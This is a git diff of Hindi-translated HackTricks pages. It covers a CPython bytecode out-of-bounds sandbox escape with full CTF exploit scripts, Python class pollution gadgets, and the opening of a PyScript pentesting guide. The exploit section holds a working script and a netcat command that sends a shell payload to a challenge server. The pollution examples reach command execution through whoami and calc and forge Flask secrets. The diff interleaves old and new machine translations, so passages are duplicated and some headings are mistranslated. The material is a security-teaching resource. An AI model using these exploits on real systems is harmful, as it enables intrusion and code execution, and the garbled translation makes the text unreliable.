वे `consts` या `names` टपल से इंडेक्स `oparg` से एक ऑब्जेक्ट पुनः प्राप्त करते हैं (जो `co_consts` और `co_names` को अंदर से नामित किया जाता है)। हम `LOAD_CONST` के बारे में निम्नलिखित छोटे स्निपेट का संदर्भ ले सकते हैं ताकि हम देख सकें कि CPython `LOAD_CONST` ओपकोड को प्रोसेस करते समय क्या करता है।
|
||||
वे `consts` या `names` टपल से अनुक्रम `oparg` से एक ऑब्जेक्ट पुनः प्राप्त करते हैं (जो `co_consts` और `co_names` को अंदर से नामित किया जाता है)। हम `LOAD_CONST` के बारे में निम्नलिखित छोटे स्निपेट का संदर्भ ले सकते हैं ताकि हम देख सकें कि CPython `LOAD_CONST` ऑपकोड को प्रोसेस करते समय क्या करता है।
|
||||
```c
|
||||
case TARGET(LOAD_CONST): {
|
||||
PREDICTED(LOAD_CONST);
|
||||
|
@ -53,12 +62,12 @@ PUSH(value);
|
|||
FAST_DISPATCH();
|
||||
}1234567
|
||||
```
|
||||
इस तरह हम OOB फीचर का उपयोग करके किसी भी मेमोरी ऑफसेट से "नाम" प्राप्त कर सकते हैं। नाम क्या है और इसका ऑफसेट क्या है, यह सुनिश्चित करने के लिए, बस `LOAD_NAME 0`, `LOAD_NAME 1` ... `LOAD_NAME 99` ... को कोशिश करते रहें। और आपको लगभग oparg > 700 में कुछ मिल सकता है। आप gdb का उपयोग करके मेमोरी लेआउट की झलक देखने की कोशिश भी कर सकते हैं, लेकिन मुझे लगता है कि यह और अधिक सरल नहीं होगा?
|
||||
इस तरह हम OOB सुविधा का उपयोग करके किसी भी मेमोरी ऑफसेट से "नाम" प्राप्त कर सकते हैं। यह सुनिश्चित करने के लिए कि उस नाम का क्या है और इसका ऑफसेट क्या है, बस `LOAD_NAME 0`, `LOAD_NAME 1` ... `LOAD_NAME 99` ... को कोशिश करते रहें। और आपको लगभग oparg > 700 में कुछ मिल सकता है। आप मेमोरी लेआउट को देखने के लिए gdb का उपयोग भी कर सकते हैं, लेकिन मुझे लगता है कि यह और अधिक सरल नहीं होगा?
|
||||
|
||||
### एक्सप्लॉइट उत्पन्न करना <a href="#generating-the-exploit" id="generating-the-exploit"></a>
|
||||
### उत्पादन उत्पन्न करना <a href="#generating-the-exploit" id="generating-the-exploit"></a>
|
||||
|
||||
नाम / स्थिरांकों के लिए उपयोगी ऑफसेट प्राप्त करने के बाद, हम उस ऑफसेट से नाम / स्थिरांक कैसे प्राप्त करें और उसका उपयोग करें? यहाँ एक ट्रिक है:\
|
||||
चलिए मान लेते हैं हम ऑफसेट 5 (`LOAD_NAME 5`) से `__getattribute__` नाम प्राप्त कर सकते हैं `co_names=()` के साथ, तो बस निम्नलिखित कार्रवाई करें:
|
||||
जब हम उन उपयोगी ऑफसेट प्राप्त कर लेते हैं नाम / स्थिर, तो हम उस ऑफसेट से नाम / स्थिर कैसे प्राप्त करें और उसका उपयोग करें? यहां एक चाल है आपके लिए:\
|
||||
चलो मान लेते हैं हम ऑफसेट 5 (`LOAD_NAME 5`) से `__getattribute__` नाम प्राप्त कर सकते हैं `co_names=()` के साथ, तो बस निम्नलिखित काम करें:
|
||||
```python
|
||||
[a,b,c,d,e,__getattribute__] if [] else [
|
||||
[].__getattribute__
|
||||
|
@ -67,7 +76,7 @@ FAST_DISPATCH();
|
|||
```
|
||||
> ध्यान दें कि इसे `__getattribute__` के रूप में नाम देना आवश्यक नहीं है, आप इसे कुछ छोटा या अधिक अजीब नाम दे सकते हैं।
|
||||
|
||||
आप इसके बाइटकोड को देखकर कारण को समझ सकते हैं:
|
||||
आप इसके bytecode को देखकर कारण को समझ सकते हैं:
|
||||
```python
|
||||
0 BUILD_LIST 0
|
||||
2 POP_JUMP_IF_FALSE 20
|
||||
|
@ -84,20 +93,20 @@ FAST_DISPATCH();
|
|||
24 BUILD_LIST 1
|
||||
26 RETURN_VALUE1234567891011121314
|
||||
```
|
||||
ध्यान दें कि `LOAD_ATTR` भी `co_names` से नाम प्राप्त करता है। Python नाम को एक ही ऑफसेट से लोड करता है अगर नाम समान है, इसलिए दूसरा `__getattribute__` भी ऑफसेट=5 से लोड होता है। इस सुविधा का उपयोग करके हम एक बार नाम मेमोरी के पास होने परित्याग कर सकते हैं।
|
||||
ध्यान दें कि `LOAD_ATTR` भी `co_names` से नाम प्राप्त करता है। Python नाम को एक ही ऑफसेट से लोड करता है अगर नाम समान है, इसलिए दूसरा `__getattribute__` भी ऑफसेट=5 से लोड होता है। इस सुविधा का उपयोग करके हम जब नाम मेमोरी के पास होता है तो एकाधिक नाम का उपयोग कर सकते हैं।
|
||||
|
||||
संख्याएँ उत्पन्न करने के लिए सरल होना चाहिए:
|
||||
नंबर उत्पन्न करने के लिए सरल होना चाहिए:
|
||||
|
||||
* 0: not \[\[]]
|
||||
* 1: not \[]
|
||||
* 2: (not \[]) + (not \[])
|
||||
* ...
|
||||
|
||||
### शोषण स्क्रिप्ट <a href="#exploit-script-1" id="exploit-script-1"></a>
|
||||
### शात्र स्क्रिप्ट <a href="#exploit-script-1" id="exploit-script-1"></a>
|
||||
|
||||
मैंने लंबाई सीमा के कारण संख्याओं का उपयोग नहीं किया।
|
||||
मैंने लंबाई सीमा के कारण स्थिरों का उपयोग नहीं किया।
|
||||
|
||||
पहले यहाँ एक स्क्रिप्ट है जिसका हमें उन नामों के ऑफसेट पता करने के लिए उपयोग करना है।
|
||||
पहले यहाँ एक स्क्रिप्ट है जिसका हमें उन नामों के ऑफसेट पता करने के लिए करना है।
|
||||
```python
|
||||
from types import CodeType
|
||||
from opcode import opmap
|
||||
|
@ -132,7 +141,7 @@ print(f'{n}: {ret}')
|
|||
|
||||
# for i in $(seq 0 10000); do python find.py $i ; done1234567891011121314151617181920212223242526272829303132
|
||||
```
|
||||
और निम्नलिखित वास्तविक Python उत्पीड़न उत्पन्न करने के लिए है।
|
||||
और निम्नलिखित वास्तविक पायथन शोषण उत्पन्न करने के लिए है।
|
||||
```python
|
||||
import sys
|
||||
import unicodedata
|
||||
|
@ -209,7 +218,7 @@ print(source)
|
|||
# (python exp.py; echo '__import__("os").system("sh")'; cat -) | nc challenge.server port
|
||||
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273
|
||||
```
|
||||
यह मुख्य रूप से निम्नलिखित कार्य करता है, उन स्ट्रिंग्स के लिए जो हम `__dir__` विधि से प्राप्त करते हैं:
|
||||
यह मुख्य रूप से निम्नलिखित कार्रवाई करता है, उन स्ट्रिंग्स के लिए जो हम `__dir__` विधि से प्राप्त करते हैं:
|
||||
```python
|
||||
getattr = (None).__getattribute__('__class__').__getattribute__
|
||||
builtins = getattr(
|
||||
|
@ -222,16 +231,17 @@ getattr(
|
|||
'__repr__').__getattribute__('__globals__')['builtins']
|
||||
builtins['eval'](builtins['input']())
|
||||
```
|
||||
{% hint style="success" %}
|
||||
एडब्ल्यूएस हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
जीसीपी हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें ट्विटर पर फॉलो करें 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके हैकिंग ट्रिक्स साझा करें।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,23 +1,23 @@
|
|||
# Class Pollution (Python's Prototype Pollution)
|
||||
# कक्षा प्रदूषण (Python का प्रोटोटाइप प्रदूषण)
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a> <strong>के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)\*\* पर फॉलो\*\* करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें** हैकिंग ट्रिक्स को **पीआर्स** और **HackTricks Cloud** github रेपो में प्रस्तुत करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## मूल उदाहरण
|
||||
|
||||
जांचें कि स्ट्रिंग के साथ ऑब्ज
|
||||
|
||||
जांचें कैसे संदेशों के साथ ऑब्जेक्ट की कक्षाओं को प्रदूषित किया जा सकता है:
|
||||
```python
|
||||
class Company: pass
|
||||
class Developer(Company): pass
|
||||
|
@ -41,9 +41,7 @@ e.__class__.__base__.__base__.__qualname__ = 'Polluted_Company'
|
|||
print(d) #<__main__.Polluted_Developer object at 0x1041d2b80>
|
||||
print(c) #<__main__.Polluted_Company object at 0x1043a72b0>
|
||||
```
|
||||
|
||||
## मूलभूत सुरक्षादायकता उदाहरण
|
||||
|
||||
```python
|
||||
# Initial state
|
||||
class Employee: pass
|
||||
|
@ -76,36 +74,57 @@ USER_INPUT = {
|
|||
merge(USER_INPUT, emp)
|
||||
print(vars(emp)) #{'name': 'Ahemd', 'age': 23, 'manager': {'name': 'Sarah'}}
|
||||
```
|
||||
|
||||
## गैजेट उदाहरण
|
||||
|
||||
<details>
|
||||
|
||||
<summary>क्लास संपत्ति की डिफ़ॉल्ट मान को RCE (subprocess) बनाना</summary>
|
||||
<summary>कक्ष संपत्ति डिफ़ॉल्ट मान को RCE (subprocess) बनाना</summary>
|
||||
```python
|
||||
from os import popen
|
||||
class Employee: pass # Creating an empty class
|
||||
class HR(Employee): pass # Class inherits from Employee class
|
||||
class Recruiter(HR): pass # Class inherits from HR class
|
||||
|
||||
\`\`\`python from os import popen class Employee: pass # Creating an empty class class HR(Employee): pass # Class inherits from Employee class class Recruiter(HR): pass # Class inherits from HR class
|
||||
|
||||
class SystemAdmin(Employee): # Class inherits from Employee class def execute\_command(self): command = self.custom\_command if hasattr(self, 'custom\_command') else 'echo Hello there' return f'\[!] Executing: "{command}", output: "{popen(command).read().strip()}"'
|
||||
class SystemAdmin(Employee): # Class inherits from Employee class
|
||||
def execute_command(self):
|
||||
command = self.custom_command if hasattr(self, 'custom_command') else 'echo Hello there'
|
||||
return f'[!] Executing: "{command}", output: "{popen(command).read().strip()}"'
|
||||
|
||||
def merge(src, dst):
|
||||
# Recursive merge function
|
||||
for k, v in src.items():
|
||||
if hasattr(dst, '__getitem__'):
|
||||
if dst.get(k) and type(v) == dict:
|
||||
merge(v, dst.get(k))
|
||||
else:
|
||||
dst[k] = v
|
||||
elif hasattr(dst, k) and type(v) == dict:
|
||||
merge(v, getattr(dst, k))
|
||||
else:
|
||||
setattr(dst, k, v)
|
||||
|
||||
## Recursive merge function
|
||||
USER_INPUT = {
|
||||
"__class__":{
|
||||
"__base__":{
|
||||
"__base__":{
|
||||
"custom_command": "whoami"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
for k, v in src.items(): if hasattr(dst, '**getitem**'): if dst.get(k) and type(v) == dict: merge(v, dst.get(k)) else: dst\[k] = v elif hasattr(dst, k) and type(v) == dict: merge(v, getattr(dst, k)) else: setattr(dst, k, v)
|
||||
recruiter_emp = Recruiter()
|
||||
system_admin_emp = SystemAdmin()
|
||||
|
||||
USER\_INPUT = { "**class**":{ "**base**":{ "**base**":{ "custom\_command": "whoami" } } } }
|
||||
print(system_admin_emp.execute_command())
|
||||
#> [!] Executing: "echo Hello there", output: "Hello there"
|
||||
|
||||
recruiter\_emp = Recruiter() system\_admin\_emp = SystemAdmin()
|
||||
# Create default value for Employee.custom_command
|
||||
merge(USER_INPUT, recruiter_emp)
|
||||
|
||||
print(system\_admin\_emp.execute\_command()) #> \[!] Executing: "echo Hello there", output: "Hello there"
|
||||
|
||||
## Create default value for Employee.custom\_command
|
||||
|
||||
merge(USER\_INPUT, recruiter\_emp)
|
||||
|
||||
print(system\_admin\_emp.execute\_command()) #> \[!] Executing: "whoami", output: "abdulrah33m"
|
||||
|
||||
````
|
||||
print(system_admin_emp.execute_command())
|
||||
#> [!] Executing: "whoami", output: "abdulrah33m"
|
||||
```
|
||||
</details>
|
||||
|
||||
<details>
|
||||
|
@ -137,40 +156,46 @@ merge({'__class__':{'__init__':{'__globals__':{'not_accessible_variable':'Pollut
|
|||
|
||||
print(not_accessible_variable) #> Polluted variable
|
||||
print(NotAccessibleClass) #> <class '__main__.PollutedClass'>
|
||||
````
|
||||
|
||||
```
|
||||
</details>
|
||||
|
||||
<details>
|
||||
|
||||
<summary>अनियमित subprocess क्रियान्वयन</summary>
|
||||
```python
|
||||
import subprocess, json
|
||||
|
||||
\`\`\`python import subprocess, json
|
||||
|
||||
class Employee: def **init**(self): pass
|
||||
class Employee:
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
def merge(src, dst):
|
||||
# Recursive merge function
|
||||
for k, v in src.items():
|
||||
if hasattr(dst, '__getitem__'):
|
||||
if dst.get(k) and type(v) == dict:
|
||||
merge(v, dst.get(k))
|
||||
else:
|
||||
dst[k] = v
|
||||
elif hasattr(dst, k) and type(v) == dict:
|
||||
merge(v, getattr(dst, k))
|
||||
else:
|
||||
setattr(dst, k, v)
|
||||
|
||||
## Recursive merge function
|
||||
# Overwrite env var "COMSPEC" to execute a calc
|
||||
USER_INPUT = json.loads('{"__init__":{"__globals__":{"subprocess":{"os":{"environ":{"COMSPEC":"cmd /c calc"}}}}}}') # attacker-controlled value
|
||||
|
||||
for k, v in src.items(): if hasattr(dst, '**getitem**'): if dst.get(k) and type(v) == dict: merge(v, dst.get(k)) else: dst\[k] = v elif hasattr(dst, k) and type(v) == dict: merge(v, getattr(dst, k)) else: setattr(dst, k, v)
|
||||
|
||||
## Overwrite env var "COMSPEC" to execute a calc
|
||||
|
||||
USER\_INPUT = json.loads('{"**init**":{"**globals**":{"subprocess":{"os":{"environ":{"COMSPEC":"cmd /c calc"\}}\}}\}}') # attacker-controlled value
|
||||
|
||||
merge(USER\_INPUT, Employee())
|
||||
merge(USER_INPUT, Employee())
|
||||
|
||||
subprocess.Popen('whoami', shell=True) # Calc.exe will pop up
|
||||
|
||||
````
|
||||
```
|
||||
</details>
|
||||
|
||||
<details>
|
||||
|
||||
<summary>ओवरराइटिंग <strong><code>__kwdefaults__</code></strong></summary>
|
||||
|
||||
**`__kwdefaults__`** सभी फ़ंक्शन की एक विशेष विशेषता है, पायथन [दस्तावेज़ीकरण](https://docs.python.org/3/library/inspect.html) के आधार पर, यह "किसी भी डिफ़ॉल्ट मानों का मैपिंग है **कीवर्ड-केवल** पैरामीटर्स के लिए।" इस विशेषता को प्रदूषित करने से हमें फ़ंक्शन के कीवर्ड-केवल पैरामीटर्स के डिफ़ॉल्ट मान को नियंत्रित करने की अनुमति मिलती है, ये वह फ़ंक्शन के पैरामीटर्स हैं जो \* या \*args के बाद आते हैं।
|
||||
**`__kwdefaults__`** सभी फ़ंक्शन की एक विशेष विशेषता है, Python [दस्तावेज़ीकरण](https://docs.python.org/3/library/inspect.html) के आधार पर, यह "किसी भी डिफ़ॉल्ट मानों का मैपिंग है **कीवर्ड-केवल** पैरामीटर्स के लिए।" इस विशेषता को प्रदूषित करने से हमें फ़ंक्शन के कीवर्ड-केवल पैरामीटर्स की डिफ़ॉल्ट मानों को नियंत्रित करने की अनुमति मिलती है, ये वह फ़ंक्शन के पैरामीटर्स हैं जो \* या \*args के बाद आते हैं।
|
||||
```python
|
||||
from os import system
|
||||
import json
|
||||
|
@ -206,33 +231,28 @@ merge(emp_info, Employee())
|
|||
print(execute.__kwdefaults__) #> {'command': 'echo Polluted'}
|
||||
execute() #> Executing echo Polluted
|
||||
#> Polluted
|
||||
````
|
||||
|
||||
```
|
||||
</details>
|
||||
|
||||
<details>
|
||||
|
||||
<summary>फ़्लास्क सीक्रेट को फ़ाइलों के बीच अधिलेखन करना</summary>
|
||||
|
||||
तो, अगर आप एक वस्तु पर क्लास प्रदूषण कर सकते हैं जो वेब के मुख्य पायथन फ़ाइल में परिभाषित है परंतु **जिसका क्लास अलग फ़ाइल में परिभाषित है**। क्योंकि पिछले पेलोड में \_\_globals\_\_ तक पहुँचने के लिए आपको वस्तु के क्लास या क्लास के विधियों तक पहुँचने की आवश्यकता है, आप **उस फ़ाइल में ग्लोबल्स तक पहुँच सकेंगे, पर मुख्य फ़ाइल में नहीं**।\
|
||||
इसलिए, आप **फ़्लास्क ऐप ग्लोबल वस्तु तक पहुँच नहीं पाएंगे** जिसने मुख्य पृष्ठ में **सीक्रेट कुंजी** को परिभाषित किया था:
|
||||
<summary>फ़्लास्क सीक्रेट को फ़ाइलों के बीच ओवरराइट करना</summary>
|
||||
|
||||
तो, अगर आप एक क्लास पोल्लूशन कर सकते हैं जो एक वेब के मुख्य पायथन फ़ाइल में परिभाषित ऑब्जेक्ट पर **हो** लेकिन **जिसका क्लास मुख्य फ़ाइल से अलग फ़ाइल में परिभाषित है**। क्योंकि पिछले payloads में \_\_globals\_\_ तक पहुँचने के लिए आपको ऑब्जेक्ट के क्लास या क्लास के मेथड्स तक पहुँचने की आवश्यकता है, आप **उस फ़ाइल में ग्लोबल्स तक पहुँच सकेंगे, लेकिन मुख्य फ़ाइल में नहीं**। \
|
||||
इसलिए, आप **फ़्लास्क एप्लिकेशन ग्लोबल ऑब्जेक्ट तक पहुँच नहीं पाएंगे** जिसने मुख्य पृष्ठ में **सीक्रेट कुंजी** को परिभाषित किया था:
|
||||
```python
|
||||
app = Flask(__name__, template_folder='templates')
|
||||
app.secret_key = '(:secret:)'
|
||||
```
|
||||
इस स्थिति में आपको एक गैजेट की आवश्यकता है जो फ़ाइलों को ट्रावर्स करने के लिए मुख्य फ़ाइल तक पहुंचने के लिए **ग्लोबल ऑब्जेक्ट `app.secret_key` तक पहुंचने** के लिए फ्लास्क सीक्रेट कुंजी को बदलने और [**इस कुंजी को जानकर विशेषाधिकारों को बढ़ाने**](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign) के लिए सक्षम होना होगा।
|
||||
|
||||
इस स्थिति में आपको एक गैजेट की आवश्यकता है ताकि मुख्य फ़ाइल तक पहुंचकर **ग्लोबल ऑब्जेक्ट `app.secret_key` तक पहुंच सकें** और फ्लास्क सीक्रेट कुंजी को बदल सकें और [**इस कुंजी को जानकर विशेषाधिकारों को बढ़ा सकें**](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign)।
|
||||
|
||||
इस व्रिटअप से एक इस प्रकार का पेलोड:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
इस तरह के एक पेलोड [इस लेखन से](https://ctftime.org/writeup/36082):
|
||||
```python
|
||||
__init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.secret_key
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
इस payload का उपयोग करें **`app.secret_key`** को बदलने के लिए (आपके ऐप में नाम अलग हो सकता है) ताकि नए और अधिक विशेषाधिकार वाले flask cookies को साइन कर सकें।
|
||||
इस payload का उपयोग करें **`app.secret_key` को बदलने** के लिए (आपके ऐप में नाम अलग हो सकता है) नए और अधिक विशेषाधिकार वाले flask cookies को साइन करने की क्षमता प्राप्त करें।
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -246,16 +266,17 @@ __init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.se
|
|||
|
||||
* [https://blog.abdulrah33m.com/prototype-pollution-in-python/](https://blog.abdulrah33m.com/prototype-pollution-in-python/)
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जीरो से हीरो तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)\*\* पर फॉलो\*\* करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें** **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos को PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,24 +1,25 @@
|
|||
# पायस्क्रिप्ट
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** (https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos को PRs जमा करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## पायस्क्रिप्ट पेंटेस्टिंग गाइड
|
||||
|
||||
पायस्क्रिप्ट एक नया फ्रेमवर्क है जो Python को HTML में एकीकृत करने के लिए विकसित किया गया है, ताकि यह HTML के साथ उपयोग किया जा सके। इस चीट शीट में, आपको अपने पेनेट्रेशन टेस्टिंग उद्देश्यों के लिए पायस्क्रिप्ट का उपयोग कैसे करना है, इसका विवरण मिलेगा।
|
||||
पायस्क्रिप्ट एक नया फ्रेमवर्क है जो Python को HTML में एकीकृत करने के लिए विकसित किया गया है, ताकि यह HTML के साथ उपयोग किया जा सके। इस चीट शीट में, आपको यहाँ पायस्क्रिप्ट का उपयोग पेनेट्रेशन टेस्टिंग के उद्देश्यों के लिए कैसे करें के बारे में जानकारी मिलेगी।
|
||||
|
||||
